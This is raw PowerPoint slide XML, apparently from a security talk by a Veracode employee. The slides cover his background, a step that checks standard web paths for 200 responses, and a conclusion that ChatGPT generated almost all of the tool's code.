                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>f the response is 404, let’s test a few standard paths and find out if there is somthing responding with a 200 status code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Let’s start with a fixed input list of paths </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ake sure to include the path we know from our demo app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4188385148"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4194819-C654-18B0-09E3-B6A67934C256}"/>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3CB3EFD0-54EB-6D8D-6762-57D613FB5A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5050CFC4-CABD-86AB-D846-72FF7140B6BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Who am I?</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D463AD-FDEF-C7C7-540B-3E100B81E041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4377791" y="1900376"/>
            <a:ext cx="6296850" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>20 years in IT Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ainly application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>orking for Veracode the last 10 years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>id some pentesting the early days (network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>I’m NOT a developer, although I understand a bit of code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A person with arms crossed smiling&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62A333E-357F-8F94-5D88-64146150FEE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1282148"/>
            <a:ext cx="3745626" cy="2702726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C245D8A-8398-3D14-508A-B1C640E97523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="5037243"/>
            <a:ext cx="11263127" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IMPORTANT!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>While I am employed by Veracode, the ideas and opinions I will be sharing today are entirely my own. They do not necessarily reflect the views or positions of Veracode. My aim is to contribute to the ongoing discussion in our field with my personal insights and perspectives.</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133049430"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="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3F215BC-93F1-ED33-E3D5-7601ACFC21CC}"/>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AA6D007E-6213-BA7F-69AD-24C42A708F29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6964C5CC-6640-0C64-E830-29C4E7AA0468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s see what it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8BC8D59-FA0F-0377-401D-62E3C60FC6E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909498" y="980967"/>
            <a:ext cx="10373003" cy="5393091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1070860043"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="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6B4C8AC-2731-044A-D41A-8EBE9D237FD4}"/>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6BB57696-5F67-D6F5-8419-02EA892EF5CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91BA5A3F-A66C-7F4D-E419-CE994F6D1016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s see what it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79A2089-2FD1-E076-C40C-6788E73C847C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="834315" y="999522"/>
            <a:ext cx="10523370" cy="5355980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="629224137"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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FDF96E1F-F917-06D9-EBFA-8C4F8B961483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206950" y="2835242"/>
            <a:ext cx="8166380" cy="1187516"/>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4000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>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5400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B3E6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFBF45E-E5F4-B0E8-A808-44440AF3ED27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609975" y="900012"/>
            <a:ext cx="4972050" cy="1159668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DONE!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8EF1B44-5AB4-A53F-2F65-9A10090A2CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609975" y="1867627"/>
            <a:ext cx="4972050" cy="115966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0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YES!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715771A2-B761-14EA-C97F-100C767902AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609974" y="2835242"/>
            <a:ext cx="6060007" cy="115966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b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sloth happy!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E3CF99-2421-15B3-4E8F-1FAFDC664E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458308" y="706279"/>
            <a:ext cx="9571136" cy="5321710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1557834368"/>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6B4C8AC-2731-044A-D41A-8EBE9D237FD4}"/>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6BB57696-5F67-D6F5-8419-02EA892EF5CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91BA5A3F-A66C-7F4D-E419-CE994F6D1016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BFC5D81-3847-CFEE-319C-989630894536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515908" y="1068150"/>
            <a:ext cx="9160184" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Almost no coding experience needed! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>All code was generated by ChatGPT, only very little updates were required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
